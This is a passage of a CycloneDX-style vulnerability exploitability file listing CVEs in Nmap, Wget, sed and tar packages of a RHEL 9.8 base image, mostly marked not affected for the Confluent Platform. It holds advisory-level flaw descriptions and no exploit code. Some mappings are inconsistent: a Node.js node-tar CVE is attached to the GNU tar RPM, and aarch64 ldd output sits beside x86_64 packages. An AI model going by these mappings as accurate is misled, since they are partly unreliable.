          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-58058",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        191
      ],
      "description": "Nmap through 7.99 does not keep the IPv6 extension-header walk within the captured packet in ipv6_get_data_primitive (libnetutil/netutil.cc), so the pointer advances past the buffer and the remaining-length computation underflows to a large value. A scanned target or on-path attacker returning a crafted IPv6 response with a truncated extension header can trigger out-of-bounds reads and a crash during raw IPv6 scans.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58058"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58058"
        },
        {
          "url": "https://github.com/bikini/exploitarium/tree/main/nmap-ipv6-extlen-wrap-poc"
        },
        {
          "url": "https://github.com/nmap/nmap/commit/bb6754e76bb1686315008e1aa1c40202a513fb83"
        },
        {
          "url": "https://nmap.org/changelog.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58058"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58058"
        },
        {
          "url": "https://www.vulncheck.com/advisories/nmap-integer-underflow-in-ipv6-extension-header-parsing"
        }
      ],
      "published": "2026-06-28T02:16:33+00:00",
      "updated": "2026-06-30T17:31:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/nmap-ncat@7.92-5.el9?arch=x86_64&distro=redhat-9.8&epoch=3",
          "versions": [
            {
              "version": "3:7.92-5.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/nmap-ncat@7.92-5.el9?arch=x86_64&distro=redhat-9.8&epoch=3"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/nmap-ncat@7.92-5.el9?arch=x86_64&distro=redhat-9.8&epoch=3"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/nmap-ncat@7.92-5.el9?arch=x86_64&distro=redhat-9.8&epoch=3"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/nmap-ncat@7.92-5.el9?arch=x86_64&distro=redhat-9.8&epoch=3"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/nmap-ncat@7.92-5.el9?arch=x86_64&distro=redhat-9.8&epoch=3"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/nmap-ncat@7.92-5.el9?arch=x86_64&distro=redhat-9.8&epoch=3"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/nmap-ncat@7.92-5.el9?arch=x86_64&distro=redhat-9.8&epoch=3"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/nmap-ncat@7.92-5.el9?arch=x86_64&distro=redhat-9.8&epoch=3"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/nmap-ncat@7.92-5.el9?arch=x86_64&distro=redhat-9.8&epoch=3"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/nmap-ncat@7.92-5.el9?arch=x86_64&distro=redhat-9.8&epoch=3"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/nmap-ncat@7.92-5.el9?arch=x86_64&distro=redhat-9.8&epoch=3"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/nmap-ncat@7.92-5.el9?arch=x86_64&distro=redhat-9.8&epoch=3"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/nmap-ncat@7.92-5.el9?arch=x86_64&distro=redhat-9.8&epoch=3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58470",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "GNU Wget through 1.25.0, fixed in commit 43d3ba9, contains an integer overflow vulnerability in the parse_content_range() function within src/http.c that allows server-controlled values to cause signed integer arithmetic to overflow. Attackers can supply malicious Content-Range header values to trigger undefined behavior and download desynchronization in the affected client.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58470"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58470"
        },
        {
          "url": "https://github.com/advisories/GHSA-5f52-px6m-c5hw"
        },
        {
          "url": "https://gitlab.com/gnuwget/wget/-/commit/43d3ba9336bc94937e6fae2365c6ffd30c34ffcf"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58470"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58470"
        },
        {
          "url": "https://www.vulncheck.com/advisories/gnu-wget-integer-overflow-via-content-range-header-parsing"
        }
      ],
      "published": "2026-07-07T21:17:28+00:00",
      "updated": "2026-07-09T16:01:18+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-8.el9_4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58471",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        122
      ],
      "description": "GNU Wget through 1.25.0, fixed in commit c2640fe, contains a heap buffer overflow vulnerability in the convert_fname() function within src/url.c that allows remote attackers to trigger memory corruption through a server-supplied filename requiring character set conversion. When the output buffer is too small during iconv E2BIG reallocation, the reallocation logic miscalculates the remaining space, leading to a heap buffer overflow that can be exploited via a maliciously crafted server response.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58471"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58471"
        },
        {
          "url": "https://github.com/advisories/GHSA-vv88-699v-w5rh"
        },
        {
          "url": "https://gitlab.com/gnuwget/wget/-/commit/c2640fe5171c59f87c58dc9fcb195b2d18b010ee"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58471"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58471"
        },
        {
          "url": "https://www.vulncheck.com/advisories/gnu-wget-heap-buffer-overflow-via-convert-fname-in-url-c"
        }
      ],
      "published": "2026-07-07T21:17:28+00:00",
      "updated": "2026-07-09T16:02:07+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-8.el9_4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58472",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "GNU Wget through 1.25.0, fixed in commit dd692d9, contains a heap buffer overflow vulnerability in the html_quote_string() function in src/convert.c that allows a remote attacker to trigger memory corruption by supplying a crafted HTML attribute with a large number of characters requiring entity encoding. A server-supplied HTML attribute causes a signed integer counter to overflow during output size accumulation, resulting in an undersized heap allocation and subsequent heap buffer overflow during the copy phase.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58472"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58472"
        },
        {
          "url": "https://github.com/advisories/GHSA-332r-8pmf-8m9p"
        },
        {
          "url": "https://gitlab.com/gnuwget/wget/-/commit/dd692d9cea5335b181d877ae917fe6e75587a812"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58472"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58472"
        },
        {
          "url": "https://www.vulncheck.com/advisories/gnu-wget-heap-buffer-overflow-via-html-attribute-encoding"
        }
      ],
      "published": "2026-07-07T21:17:28+00:00",
      "updated": "2026-07-09T15:58:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-8.el9_4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5958",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        367
      ],
      "description": "When sed is invoked with both -i (in-place edit) and --follow-symlinks, the function open_next_file() performs two separate, non-atomic filesystem operations on the same path: \n1. resolves symlink to its target and stores\u00a0the resolved path for determining when output is written,\n2. opens the original symlink path\u00a0(not the resolved one) to read the file. \nBetween these two calls there is a race window. If an attacker atomically replaces the symlink with a different target during that window, sed will: read content from the new (attacker-chosen) symlink target and write the processed result to the path recorded in step 1.\u00a0This can lead to arbitrary file overwrite with attacker-controlled content in the context of the sed process.\n\n\nThis issue was fixed in version 4.10.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5958"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/05/13/1"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5958"
        },
        {
          "url": "https://cert.pl/en/posts/2026/04/CVE-2026-5958"
        },
        {
          "url": "https://github.com/advisories/GHSA-9r7w-j29g-xqx8"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5958"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8229-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8229-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5958"
        },
        {
          "url": "https://www.gnu.org/software/sed"
        },
        {
          "url": "https://www.gnu.org/software/sed/"
        }
      ],
      "published": "2026-04-20T12:16:08+00:00",
      "updated": "2026-06-17T10:59:56+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.8-10.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/sed@4.8-10.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-59871",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        704
      ],
      "description": "node-tar is a tar archive manipulation library for Node.js. Prior to 7.5.18, node-tar coerces all-digit PAX path and linkpath values in src/pax.ts to JavaScript numbers, causing downstream path handling such as normalizeWindowsPath(entry.path).split('/') to throw an uncaught TypeError. This issue is fixed in version 7.5.18.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59871"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59871"
        },
        {
          "url": "https://github.com/isaacs/node-tar"
        },
        {
          "url": "https://github.com/isaacs/node-tar/commit/e02a4e9e013c4be95302e2eb2047a942b883c27b"
        },
        {
          "url": "https://github.com/isaacs/node-tar/releases/tag/v7.5.18"
        },
        {
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-w8wr-v893-vjvp"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59871"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59871"
        }
      ],
      "published": "2026-07-08T16:16:33+00:00",
      "updated": "2026-07-10T19:02:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.34-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
